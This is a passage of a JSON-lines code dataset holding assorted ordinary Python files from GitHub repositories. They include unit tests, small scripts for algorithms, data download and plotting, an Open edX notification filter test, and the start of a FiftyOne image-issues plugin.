el origen.\n elif x == 0:\n print(cuadrantes[1]) # Si 'x' es cero, el punto está en el eje Y.\n elif y == 0:\n print(cuadrantes[2]) # Si 'y' es cero, el punto está en el eje X.\n elif x > 0 and y > 0:\n print(cuadrantes[3]) # Si 'x' e 'y' son mayores que cero, el punto está en el Cuadrante I.\n elif x < 0 and y > 0:\n print(cuadrantes[4]) # Si 'x' es menor que cero y 'y' es mayor que cero, el punto está en el Cuadrante II.\n elif x < 0 and y < 0:\n print(cuadrantes[5]) # Si ambos valores son menores que cero, el punto está en el Cuadrante III.\n elif x > 0 and y < 0:\n print(cuadrantes[6]) # Si 'x' es mayor que cero y 'y' es menor que cero, el punto está en el Cuadrante IV.\n else:\n print('El punto está en el origen del sistema de coordenadas.') # Si ninguna condición se cumple, el punto está en el origen.\n\n # Preguntamos al usuario si desea hacer otra consulta o no, almacenando su respuesta en la variable 'continuar'.\n continuar = input(\"¿Deseas hacer otra consulta? (s/n): \")\n\n # Comparamos la respuesta del usuario con 's' (sin importar si está en mayúscula o minúscula).\n # Si la respuesta no es 's', rompemos el bucle usando \"break\" y finalizamos el programa.\n if continuar.lower() != 's':\n break\n","repo_name":"JetsemaniHidalgo/UnidadM2","sub_path":"Cuadrantes.py","file_name":"Cuadrantes.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29182941777","text":"# coding: utf-8\nfrom __future__ import print_function\n\nimport errno\nimport socket\nimport contextlib\nimport concurrent.futures\nimport itertools\n\nimport tornado.gen\nimport tornado.web\nimport tornado.httpserver\nimport pytest\n\nimport pyneh\n\nOK = \"OK\"\n\n\nclass EchoHandler(tornado.web.RequestHandler):\n\n def get(self):\n self.set_header(\"X-Yandex\", \"test\")\n self.write(OK)\n self.finish()\n\n def post(self):\n self.write(self.request.body)\n self.finish()\n\n\nclass HeaderHandler(tornado.web.RequestHandler):\n\n def post(self):\n assert self.request.headers.get(\"X-Yandex\") == \"something\"\n assert self.request.headers.get(\"Content-Type\") == \"application/json\"\n self.write(\"bob\")\n self.finish()\n\n\nclass SleepHandler(tornado.web.RequestHandler):\n\n @tornado.gen.coroutine\n def get(self):\n yield tornado.gen.sleep(int(self.get_argument(\"timeout\", default=\"0\")))\n self.write(OK)\n self.finish()\n\n\nclass BadHandler(tornado.web.RequestHandler):\n\n def get(self):\n self.set_status(503)\n self.finish()\n\n\n@pytest.yield_fixture\ndef server_address(io_loop):\n app = tornado.web.Application([\n (r\"/post\", EchoHandler),\n (r\"/get\", EchoHandler),\n (r\"/header\", HeaderHandler),\n (r\"/sleep\", SleepHandler),\n (r\"/error\", BadHandler)\n ])\n server = tornado.httpserver.HTTPServer(app, io_loop=io_loop)\n\n sock = socket.socket(socket.AF_INET6)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)\n sock.setblocking(0)\n sock.bind((\"::\", 0))\n sock.listen(128)\n server.add_sockets([sock])\n\n try:\n yield \"[::1]:{0}\".format(sock.getsockname()[1])\n finally:\n server.stop()\n sock.close()\n\n\n@pytest.fixture\ndef thread_pool():\n return concurrent.futures.ThreadPoolExecutor(max_workers=1)\n\n\n@pytest.fixture\ndef requester():\n return pyneh.Requester()\n\n\ndef assert_that_response_is_good(response):\n assert response is not None and response.ready and not response.failed\n\n\ndef assert_that_response_data_equal_to(response, data):\n assert response.data == data and response.status_code == 0 and response.error_code == 0\n\n\ndef test_empty_requester(requester):\n assert not list(requester.iterate(0.001))\n\n\ndef test_bad_schema(requester):\n with pytest.raises(Exception):\n requester.add(\"wrong://schema\")\n\n\ndef test_options(requester):\n requester.set_connect_timeout(\"5s\")\n requester.set_slow_connect(\"100ms\")\n\n with pytest.raises(Exception):\n requester.set_connect_timeout(\"wrong\")\n\n with pytest.raises(Exception):\n requester.set_slow_connect(\"wrong\")\n\n\n@pytest.mark.gen_test\ndef test_get_request(requester, server_address, thread_pool):\n requester.add(\"http://{}/get\".format(server_address))\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert_that_response_data_equal_to(response, OK)\n assert response.duration\n assert dict(response.headers).get(\"X-Yandex\") == \"test\"\n\n\n@pytest.mark.gen_test\ndef test_post_request(requester, server_address, thread_pool):\n body = b\"something\\x00somewhere\"\n requester.add(\"post://{}/post\".format(server_address), data=body)\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert_that_response_data_equal_to(response, body)\n\n\n@pytest.mark.gen_test\ndef test_http_request(requester, server_address, thread_pool):\n request = pyneh.HttpRequest(\"http://{}/header\".format(server_address))\n requester.add_request(request.set_content(\"alice\").set_content_type(\"application/json\").add_header(\"X-Yandex\", \"something\"))\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert_that_response_data_equal_to(response, \"bob\")\n\n\n@pytest.mark.gen_test\ndef test_wait_timeout(requester, server_address, thread_pool):\n requester.add(\"http://{}/sleep?timeout=10\".format(server_address))\n response = yield thread_pool.submit(requester.wait, 0.1)\n assert response is None\n\n\n@pytest.mark.gen_test\ndef test_request_timeout(requester, server_address, thread_pool):\n requester.add(\"http://{}/sleep?timeout=10\".format(server_address), timeout=0.1)\n response = yield thread_pool.submit(requester.wait)\n assert response is not None and response.ready\n assert response.failed and response.cancelled\n assert response.error_text\n\n\n@pytest.mark.gen_test\ndef test_request_cancel(requester, server_address, thread_pool):\n group_id = requester.reserve_group_id()\n requester.add_to_group(\"http://{}/sleep?timeout=10\".format(server_address), group_id, timeout=10)\n response = yield thread_pool.submit(requester.wait, 0.1)\n assert response is None\n requester.cancel_group(group_id)\n response = yield thread_pool.submit(requester.wait)\n assert response is not None and response.ready\n assert response.failed and response.cancelled\n assert response.error_text\n\n\n@pytest.mark.gen_test\ndef test_failing_request(requester, server_address, thread_pool):\n requester.add(\"http://{}/error\".format(server_address))\n response = yield thread_pool.submit(requester.wait)\n assert response is not None and response.ready\n assert response.failed and response.status_code == 503 and response.error_text\n\n\n@pytest.mark.gen_test\ndef test_payload(requester, server_address, thread_pool):\n payload = object()\n requester.add(\"http://{}/get\".format(server_address), payload=payload)\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert response.payload is payload\n\n\n@pytest.mark.gen_test\ndef test_multiple_requests(requester, server_address, thread_pool):\n count = 10\n for idx in xrange(count):\n requester.add(\"http://{}/get\".format(server_address), payload=idx)\n responses = yield thread_pool.submit(lambda it: list(itertools.islice(it, count)), requester.iterate())\n assert {resp.payload for resp in responses} == {idx for idx in xrange(count)}\n for resp in responses:\n assert_that_response_is_good(resp)\n\n\n@pytest.mark.gen_test\ndef test_reusing(requester, server_address, thread_pool):\n for _ in xrange(3):\n requester.add(\"http://{}/get\".format(server_address))\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n\n\ndef test_error_code(requester):\n with contextlib.closing(socket.socket(socket.AF_INET6)) as sock:\n sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)\n sock.bind((\"::\", 0))\n port = sock.getsockname()[1]\n requester.add(\"http://[::1]:{}/\".format(port))\n response = requester.wait()\n assert response is not None and response.ready and response.failed\n assert response.error_code == errno.ECONNREFUSED and not response.status_code\n\n\ndef test_mlock():\n try:\n pyneh.lock_all_memory()\n except RuntimeError:\n # TODO: test it properly\n pass\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/test_bindings.py","file_name":"test_bindings.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25195831930","text":"#!/usr/bin/env python\n\nimport bs4\nimport glob\nimport json\nimport os\nimport requests\nimport time\n\n\nAPI_KEY = os.getenv('ANTIPLAGIAT_API_KEY')\nTOOL = 'antiplagiat-online'\n\nreports = [f.replace('./report/', '') for f in glob.glob('./report/*.json')]\ntopics = [f.replace('./data/', '') for f in glob.glob('./data/*.json')]\n\n\ndef validate(topic: str) -> None:\n start = time.time()\n\n text: str\n with open(f'./data/{topic}', 'r') as rfile:\n content = json.load(rfile)['steps'][0]['block']['text']\n text = bs4.BeautifulSoup(content, features='lxml').text\n text = text[4:] if text.startswith('
') else text\n text = text[5:] if text.startswith('') else text\n\n response = requests.post(\n f'https://be1.ru/api/tools/add-task?apikey={API_KEY}',\n data={'tool': TOOL, 'text': text[:10000]}\n )\n print(response.json())\n slug = response.json()['slug']\n\n print(f'time spent to get slug={slug}: {time.time() - start}')\n\n for _ in range(100):\n result = requests.get(\n f'https://be1.ru/api/tools/get-result?apikey={API_KEY}&tool={TOOL}&slug={slug}',\n )\n if not result.json().get('result'):\n print(f'time spent position={result.json().get(\"position\")}: {time.time() - start}')\n time.sleep(.2)\n continue\n print(f'time spent to get final result: {time.time() - start}')\n with open(f'./report/{topic}', 'wb') as out:\n out.write(result.content)\n break\n\n\nfor topic in [topic for topic in topics if topic not in reports][:85]:\n validate(topic)\n","repo_name":"ant1k9/hs-perfect-topic","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15314030854","text":"#!/usr/bin/env python3\nimport requests\nimport os\n\nurl = \"http://pic29.photophoto.cn/20131204/0034034499213463_b.jpg\"\npath = os.getcwd()\nphname = path + '\\\\1-' + url.split('/')[-1]\n\ntry:\n\tuag = {'user-agent':'Chrome/66.0.3359.117'}\n\tr = requests.get(url,headers=uag)\n\tr.raise_for_status()\n\t\n\twith open(phname,'wb') as f:\n\t\tf.write(r.content)\n\t\tf.close()\n\t\tprint('Sucessed')\nexcept:\n\tprint(\"Wrong\")\n\n","repo_name":"liujx42/python-WebCrawlerLearning","sub_path":"MOOC/1-photo_request_test.py","file_name":"1-photo_request_test.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19552144520","text":"import os\nimport subprocess\nimport glob\n\nalgos = ['dfs', 'bfs', 'ucs', 'astar', 'mm0', 'mm']\nlayouts = []\nflag = 0\n\nfor file in os.listdir('layouts_selective'):\n if flag!=0:\n layouts.append(file.split('.')[0])\n flag = 1\nlist_of_files = sorted(layouts)\nfrom pdb import set_trace as bp\n#bp()\n# print(list_of_files)\nselected_layouts = ['mediumMaze','mediumCorners','trickySearch']\nlegnth = [11,11,8]\nfor run in range(0,3):\n results = {}\n values = []\n for algo in algos:\n temp = []\n for layout in range(1,legnth[run]):\n count = 0\n # if 'mediumMaze' not in layout:\n # if 'mediumCorners' not in layout:\n # if 'trickySearch' not in layout:\n #print(layout)\n # if selected_layouts[run] not in layout:\n # continue\n command_str = 'python3 pacman.py -l layouts_selective/' + selected_layouts[run] + '_' + str(layout) + '.lay -p SearchAgent -a fn=' + algo\n\n if 'Corners' in selected_layouts[run]:\n command_str = command_str + ',prob=CornersProblem'\n if algo != 'mm0':\n command_str = command_str + ',heuristic=cornersHeuristic'\n\n elif 'Search' in selected_layouts[run] or 'Dotted' in selected_layouts[run]:\n command_str = command_str + ',prob=FoodSearchProblem'\n if algo != 'mm0':\n command_str = command_str + ',heuristic=foodSearchHeuristic'\n\n elif algo == 'astar' or algo == 'mm':\n command_str = command_str + ',heuristic=manhattanHeuristic'\n\n if 'Classic' in selected_layouts[run]:\n continue\n\n command_str = command_str + ' --frameTime 0.001 -q'\n print(command_str)\n result = subprocess.run(command_str.split(' '), capture_output=True).stdout.decode()\n\n cost = int(str(result).split('Path found with total cost of')[1].split('in')[0])\n from pdb import set_trace as bp\n\n # bp()\n time = float(\n str(result).split('Path found with total cost of')[1].split('in')[1].split('seconds')[0]) * 1000.00\n nodes_exp = int(result.split('Search nodes expanded:')[1].split('\\n')[0])\n score = int(result.split('Score:')[1].split('\\n')[0])\n\n results[(algo, selected_layouts[run]+ '_' + str(layout))] = [cost, nodes_exp, score, time]\n temp.append(nodes_exp)\n values.append(temp)\n\n final_list = []\n for key in results.keys():\n print(key, results[key])\n final_list.append([key[0], key[1], results[key][0], results[key][1], results[key][2], results[key][3]])\n\n import csv\n\n header = ['Algo', 'environment', 'Path cost', 'Nodes expanded', 'Score', 'Time']\n header2 = ['T-test Results with MM', 'DFS', 'BFS', 'UCS', 'ASTAR', 'MM0']\n\n from scipy import stats\n\n t_value_list = []\n p_value_list = []\n '''for i in range(len(values)):\n temp_t = []\n temp_p = []\n for j in range(len(values)):\n t_value,p_value = stats.ttest_ind(values[j], values[i])\n t_value_list.append(t_value)\n p_value_list.append(p_value)\n temp_p.append(p_value/2)\n temp_t.append(t_value)\n t_value_list.append(temp_t)\n p_value_list.append(temp_p)'''\n\n t_value_list.append('T_value')\n p_value_list.append('P_value')\n\n for i in range(len(values)):\n print(values[i])\n for i in range(len(values)-1):\n t_value, p_value = stats.ttest_ind(values[i], values[-1])\n t_value_list.append(t_value)\n p_value_list.append(p_value)\n\n print(t_value_list)\n print(p_value_list)\n\n with open(selected_layouts[run] + '_output.csv', 'w', encoding='UTF8') as f:\n writer = csv.writer(f)\n\n # write the header\n writer.writerow(header)\n\n # write the data\n for line in final_list:\n writer.writerow(line)\n writer.writerow(header2)\n writer.writerow(t_value_list)\n writer.writerow(p_value_list)","repo_name":"navyasri1/AI_Project","sub_path":"1.search/selected_layout_run.py","file_name":"selected_layout_run.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"41054239878","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 5 11:43:25 2022\n\n@author: ExoFlare\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndatasets = ['complex_1', 'complex_2', 'complex_3', 'complex_4', 'complex_5', 'complex_6', 'complex_7', 'complex_8', 'complex_9', 'complex_10',\n\t'complex_11', 'complex_12', 'complex_13', 'complex_14', 'complex_15', 'complex_16',\n 'complex_17', 'complex_18', 'complex_19', 'complex_20', 'high-noise_1', 'high-noise_2', 'high-noise_3',\n\t'high-noise_4', 'high-noise_5', 'high-noise_6', 'high-noise_7', 'high-noise_8', 'high-noise_9', \n\t'high-noise_10', 'high-noise_11', 'high-noise_12', 'high-noise_13', \n 'high-noise_14', 'high-noise_15', 'high-noise_16', 'high-noise_17', 'high-noise_18', 'high-noise_19', 'high-noise_20', \n 'dens-diff_1', 'dens-diff_2', 'dens-diff_3', 'dens-diff_4', 'dens-diff_5', 'dens-diff_6', 'dens-diff_7', 'dens-diff_8',\n\t'dens-diff_9', 'dens-diff_10', 'dens-diff_11', 'dens-diff_12', 'dens-diff_13', 'dens-diff_14', 'dens-diff_15', 'dens-diff_16', \n 'dens-diff_17', 'dens-diff_18', 'dens-diff_19', 'dens-diff_20',\n\t'low-noise_1', 'low-noise_2', 'low-noise_3', 'low-noise_4', 'low-noise_5', 'low-noise_6', 'low-noise_7', 'low-noise_8', 'low-noise_9',\n\t'low-noise_10', 'low-noise_11', 'low-noise_12', 'low-noise_13', 'low-noise_14', 'low-noise_15', 'low-noise_16', \n 'low-noise_17', 'low-noise_18', 'low-noise_19', 'low-noise_20']\n\nbase_dir = os.getcwd()\nresults_dir = '/results/'\nireos_java_dir = 'ireos_java/'\nireos_dir = 'ireos/'\n\n# define algorithm of java implementation -> column name later\njava_predictors = ['Kernel Logistic Regression']\n\n# calculate mean and standard deviation for kernel logistic regression\nresult_java = []\nresult_java_std = []\nfor data_set in datasets:\n mean_ = pd.read_csv(base_dir + results_dir + ireos_java_dir + data_set + '.csv').to_numpy().mean()\n std_ = pd.read_csv(base_dir + results_dir + ireos_java_dir + data_set + '.csv').to_numpy().std()\n result_java = np.append(result_java, mean_)\n result_java_std = np.append(result_java_std, std_)\n \n \nfireos_predictors = ['Decision Tree', 'Random Forest', 'Support Vector Machine', 'LibLinear']\nfireos_suffixes = ['-decision_tree_native-nothing-false-sequential', '-random_forest_native-nothing-false-sequential'\n ,'-libsvm-parallel', '-liblinear-nothing-false-sequential']\n\nnum_predictors = len(fireos_suffixes)\nnum_datasets = len(datasets)\n\nresult_fireos = np.zeros((num_datasets, num_predictors))\nresult_fireos_std = np.zeros((num_datasets, num_predictors))\n\n# calculate mean and standard deviation for fireos predictors\nfor i in range(0, num_predictors):\n for j in range(0, num_datasets):\n mean_ = pd.read_csv(base_dir + results_dir + ireos_dir + datasets[j] + fireos_suffixes[i] + '.csv', header=0).to_numpy().mean()\n std_ = pd.read_csv(base_dir + results_dir + ireos_dir + datasets[j] + fireos_suffixes[i] + '.csv', header=0).to_numpy().std()\n result_fireos[j][i] = mean_\n result_fireos_std[j][i] = std_\n \n# concat java and fireos solutions\npredictors = np.append(java_predictors, fireos_predictors)\nresults = np.column_stack((result_java, result_fireos))\nstds = np.column_stack((result_java_std, result_fireos_std))\nstds_df = pd.DataFrame(stds, columns=predictors, index=datasets)\n\nresult_df = pd.DataFrame(results, columns=predictors, index=datasets)\nresult_df.index.name='Dataset'\n\nsns.set_style('darkgrid')\nfor predictor in predictors:\n ax = sns.lineplot(x=\"Dataset\", y=predictor, data=result_df, marker='o')\n ax.tick_params(axis='x', rotation=90)\n \nax.legend(predictors)\nplt.title('Separabilities of different predictors over different datasets')\nplt.ylabel('Separability')\nplt.show()","repo_name":"ExoFlare/pyIREOS","sub_path":"ireos_comparator2.py","file_name":"ireos_comparator2.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23513387481","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 12 21:10:57 2021\r\n\r\n@author: beile.yaaqob.aisin\r\n\"\"\"\r\n\r\nimport pandas_datareader as web\r\nimport pandas as pd\r\nimport datetime as dt\r\n\r\npath = 'C://Users/beile.yaaqob.aisin/Downloads/The_Reddit_Ethereum_Dataset/'\r\n\r\nstart = dt.datetime(2016,5,15) # arbitrary begining date of the last market cycle\r\nend = dt.datetime(2021,11,1) #end date of the eth reddit dataset\r\n\r\neth = web.DataReader('ETH-USD', 'yahoo', start, end)\r\nbtc = web.DataReader('BTC-USD', 'yahoo', start, end)\r\n\r\neth.to_csv(path+'eth_price.csv')\r\nbtc.to_csv(path+'btc_price.csv')","repo_name":"BYakovAisin/Reddit_Data_ETH_Price_Model","sub_path":"crypt_price_pddata.py","file_name":"crypt_price_pddata.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12614306343","text":"\"\"\"\nTest for the NotificationFilter class.\n\"\"\"\nfrom datetime import timedelta\nfrom unittest import mock\n\nimport ddt\nfrom django.utils.timezone import now\n\nfrom common.djangoapps.course_modes.models import CourseMode\nfrom common.djangoapps.student.models import CourseEnrollment\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom openedx.core.djangoapps.content.course_overviews.models import CourseOverview\nfrom openedx.core.djangoapps.notifications.filters import NotificationFilter\nfrom openedx.features.course_duration_limits.models import CourseDurationLimitConfig\nfrom openedx.features.course_experience.tests.views.helpers import add_course_mode\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase\nfrom xmodule.modulestore.tests.factories import CourseFactory\n\n\n@ddt.ddt\nclass CourseExpirationTestCase(ModuleStoreTestCase):\n \"\"\"Tests to verify the get_user_course_expiration_date function is working correctly\"\"\"\n\n def setUp(self):\n super().setUp() # lint-amnesty, pylint: disable=super-with-arguments\n self.course = CourseFactory(\n start=now() - timedelta(weeks=10),\n )\n\n self.user = UserFactory()\n self.user_1 = UserFactory()\n\n # Make this a verified course, so we can test expiration date\n add_course_mode(self.course, mode_slug=CourseMode.AUDIT)\n add_course_mode(self.course)\n CourseEnrollment.enroll(self.user, self.course.id, CourseMode.AUDIT)\n expired_audit = CourseEnrollment.enroll(self.user, self.course.id, CourseMode.AUDIT)\n expired_audit.created = now() - timedelta(weeks=6)\n expired_audit.save()\n\n @mock.patch(\"openedx.core.djangoapps.course_date_signals.utils.get_course_run_details\")\n def test_audit_expired_filter(\n self,\n mock_get_course_run_details,\n ):\n \"\"\"\n Test if filter_audit_expired function is working correctly\n \"\"\"\n\n mock_get_course_run_details.return_value = {'weeks_to_complete': 4}\n result = NotificationFilter.filter_audit_expired(\n [self.user.id, self.user_1.id],\n self.course,\n )\n self.assertEqual([self.user_1.id], result)\n\n mock_get_course_run_details.return_value = {'weeks_to_complete': 7}\n result = NotificationFilter.filter_audit_expired(\n [self.user.id, self.user_1.id],\n self.course,\n )\n self.assertEqual([self.user.id, self.user_1.id], result)\n\n CourseDurationLimitConfig.objects.create(\n enabled=True,\n course=CourseOverview.get_from_id(self.course.id),\n enabled_as_of=now(),\n )\n # weeks_to_complete is set to 4 because we want to test if CourseDurationLimitConfig is working correctly.\n mock_get_course_run_details.return_value = {'weeks_to_complete': 4}\n result = NotificationFilter.filter_audit_expired(\n [self.user.id, self.user_1.id],\n self.course,\n )\n self.assertEqual([self.user.id, self.user_1.id], result)\n\n @mock.patch(\"openedx.core.djangoapps.course_date_signals.utils.get_course_run_details\")\n @mock.patch(\"openedx.core.djangoapps.notifications.filters.NotificationFilter.filter_audit_expired\")\n def test_apply_filter(\n self,\n mock_filter_audit_expired,\n mock_get_course_run_details,\n ):\n \"\"\"\n Test if apply_filter function is working correctly\n \"\"\"\n mock_get_course_run_details.return_value = {'weeks_to_complete': 4}\n mock_filter_audit_expired.return_value = [self.user.id, self.user_1.id]\n result = NotificationFilter().apply_filters(\n [self.user.id, self.user_1.id],\n self.course.id,\n 'new_comment_on_response'\n )\n self.assertEqual([self.user.id, self.user_1.id], result)\n mock_filter_audit_expired.assert_called_once()\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/notifications/tests/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"2546109852","text":"size = int(input(\"Enter size of the Linked List: \"))\n\nlinkedlist = [None for i in range(size)]\nlistpointers = [i + 1 for i in range(size + 2)]\nstartpointer = -1\nnull = -1\nheappointer = 0\noldindex = startpointer\ninitial_run = True\n\n\ndef add(x):\n global startpointer, heappointer, listpointers, initial_run\n if heappointer != null and heappointer != size:\n temp = startpointer\n startpointer = heappointer\n heappointer = listpointers[heappointer]\n linkedlist[startpointer] = x\n listpointers[startpointer] = temp\n if initial_run:\n listpointers[0], listpointers[-1] = null, null\n initial_run = False\n else:\n print(\"Linked List is Full - can't Insert\")\n\n\ndef remove(x):\n global startpointer, heappointer, oldindex\n if startpointer != null:\n index = startpointer\n while linkedlist[index] != x and index != null:\n oldindex = index\n index = listpointers[index]\n if index == null:\n print(x, \"not found\")\n else:\n linkedlist[index] = None\n temp = listpointers[index]\n listpointers[index] = heappointer\n heappointer = index\n listpointers[oldindex] = temp\n else:\n print(\"Linked List is Empty, can't Delete\")\n\n\ndef search(key):\n for n in range(len(linkedlist)):\n if linkedlist[n] == key:\n print('Found at position', n + 1)\n break\n else:\n print('Not found')\n\n\nwhile True:\n menu = int(input(f\"\"\"Choose an option:\n1. Add\n2. Delete\n3. Search\n4. Display\n5. Exit\n\nLinked List: {linkedlist}\nList Pointers: {listpointers}\n-> \"\"\"))\n if menu == 1:\n item = int(input(\"Enter item to be Inserted: \"))\n add(item)\n print(startpointer)\n print(heappointer)\n elif menu == 2:\n item = int(input(\"Enter item to be Deleted: \"))\n remove(item)\n print(startpointer)\n print(heappointer)\n elif menu == 3:\n value = int(input(\"Enter item to Search: \"))\n search(value)\n elif menu == 4:\n print(linkedlist)\n print(listpointers)\n elif menu == 5:\n break\n else:\n print(\"Enter a value between 1 - 4\")\n","repo_name":"AwabIsam/A-Level","sub_path":"Linked List(Array).py","file_name":"Linked List(Array).py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24499605969","text":"import Floyds\nimport sys\nimport time\n\n\nif __name__ == '__main__':\n \n graph = [[0, 7, Floyds.NO_PATH, 8],\n [Floyds.NO_PATH, 0, 5, Floyds.NO_PATH],\n [Floyds.NO_PATH, Floyds.NO_PATH, 0, 2],\n [Floyds.NO_PATH, Floyds.NO_PATH, Floyds.NO_PATH, 0]\n ]\n \n # create a working copy of the graph to pass to the function.\n dist = [] \n for i in graph:\n new_i=[]\n for j in i:\n new_i.append(j)\n dist.append(new_i)\n \n # run each test 500 times in order to test performace differences\n \n #recursive_test\n started_at = time.time()\n for _ in range(75000):\n Floyds.floydWarshall(dist,0)\n \n recursive_time = time.time() - started_at\n \n print('It took the recursive function {}s to complete 75000 runs'.format(round(recursive_time,2)))\n \n dist = [] \n for i in graph:\n new_i=[]\n for j in i:\n new_i.append(j)\n dist.append(new_i)\n \n #iterative_test\n started_at = time.time()\n for _ in range(75000):\n Floyds.floydWarshallIterative(dist)\n \n iterative_time = time.time() - started_at\n \n print('It took the iterative function {}s to complete 75000 runs'.format(round(iterative_time,2)))\n \n dist = [] \n for i in graph:\n new_i=[]\n for j in i:\n new_i.append(j)\n dist.append(new_i)","repo_name":"Zunaira1989/FloydsAssignment","sub_path":"performancetest.py","file_name":"performancetest.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23910926442","text":"\"\"\"Common Issues plugin.\n\nThis plugin provides operators to compute common issues in image datasets.\nIt is open source, and is adapted heavily from leading open source projects\nlisted in the README.\n|\n\"\"\"\n\nimport numpy as np\n\n\nimport cv2\nfrom PIL import Image\n\n\nimport fiftyone as fo\nimport fiftyone.operators as foo\nfrom fiftyone.operators import types\nfrom fiftyone import ViewField as F\n\n\n######## HELPER FUNCTIONS ########\n\n\ndef get_filepath(sample):\n return (\n sample.local_path if hasattr(sample, \"local_path\") else sample.filepath\n )\n\n\ndef _crop_pillow_image(pillow_img, detection):\n img_w, img_h = pillow_img.width, pillow_img.height\n\n bounding_box = detection.bounding_box\n left, top, width, height = bounding_box\n left *= img_w\n top *= img_h\n right = left + width * img_w\n bottom = top + height * img_h\n\n return pillow_img.crop((left, top, right, bottom))\n\n\ndef _get_pillow_patch(sample, detection):\n img = Image.open(get_filepath(sample))\n return _crop_pillow_image(img, detection)\n\n\ndef _convert_pillow_to_opencv(pillow_img):\n # pylint: disable=no-member\n return cv2.cvtColor(np.array(pillow_img), cv2.COLOR_RGB2BGR)\n\n\ndef _convert_opencv_to_pillow(opencv_image):\n # pylint: disable=no-member\n return Image.fromarray(cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB))\n\n\ndef _get_opencv_grayscale_image(sample):\n # pylint: disable=no-member\n return cv2.imread(get_filepath(sample), cv2.IMREAD_GRAYSCALE)\n\n\n######## CONTEXT & INPUT MANAGEMENT ########\n\n\ndef _execution_mode(ctx, inputs):\n delegate = ctx.params.get(\"delegate\", False)\n\n if delegate:\n description = \"Uncheck this box to execute the operation immediately\"\n else:\n description = \"Check this box to delegate execution of this task\"\n\n inputs.bool(\n \"delegate\",\n default=False,\n required=True,\n label=\"Delegate execution?\",\n description=description,\n view=types.CheckboxView(),\n )\n\n if delegate:\n inputs.view(\n \"notice\",\n types.Notice(\n label=(\n \"You've chosen delegated execution. Note that you must \"\n \"have a delegated operation service running in order for \"\n \"this task to be processed. See \"\n \"https://docs.voxel51.com/plugins/index.html#operators \"\n \"for more information\"\n )\n ),\n )\n\n\ndef _list_target_views(ctx, inputs):\n has_view = ctx.view != ctx.dataset.view()\n has_selected = bool(ctx.selected)\n default_target = \"DATASET\"\n if has_view or has_selected:\n target_choices = types.RadioGroup()\n target_choices.add_choice(\n \"DATASET\",\n label=\"Entire dataset\",\n description=\"Run for the entire dataset\",\n )\n\n if has_view:\n target_choices.add_choice(\n \"CURRENT_VIEW\",\n label=\"Current view\",\n description=\"Run for the current view\",\n )\n default_target = \"CURRENT_VIEW\"\n\n if has_selected:\n target_choices.add_choice(\n \"SELECTED_SAMPLES\",\n label=\"Selected samples\",\n description=\"Run for the selected samples\",\n )\n default_target = \"SELECTED_SAMPLES\"\n\n inputs.enum(\n \"target\",\n target_choices.values(),\n default=default_target,\n view=target_choices,\n )\n else:\n ctx.params[\"target\"] = \"DATASET\"\n\n\ndef _get_target_view(ctx, target):\n if target == \"SELECTED_SAMPLES\":\n return ctx.view.select(ctx.selected)\n\n if target == \"DATASET\":\n return ctx.dataset\n\n return ctx.view\n\n\ndef _handle_patch_inputs(ctx, inputs):\n target_view = _get_target_view(ctx, ctx.params.get(\"target\", None))\n patch_types = (fo.Detection, fo.Detections, fo.Polyline, fo.Polylines)\n patches_fields = list(\n target_view.get_field_schema(embedded_doc_type=patch_types).keys()\n )\n\n if patches_fields:\n patches_field_choices = types.DropdownView()\n for field in sorted(patches_fields):\n patches_field_choices.add_choice(field, label=field)\n\n inputs.str(\n \"patches_field\",\n default=None,\n required=False,\n label=\"Patches field\",\n description=(\n \"An optional sample field defining image patches in each \"\n \"sample to run the computation on. If omitted, the full images \"\n \"will be used.\"\n ),\n view=patches_field_choices,\n )\n\n\n######## COMPUTATION FUNCTIONS ########\n\n#### ASPECT RATIO ####\ndef _compute_aspect_ratio(width, height):\n ratio = width / height\n return min(ratio, 1 / ratio)\n\n\ndef compute_sample_aspect_ratio(sample):\n width, height = sample.metadata.width, sample.metadata.height\n return _compute_aspect_ratio(width, height)\n\n\ndef 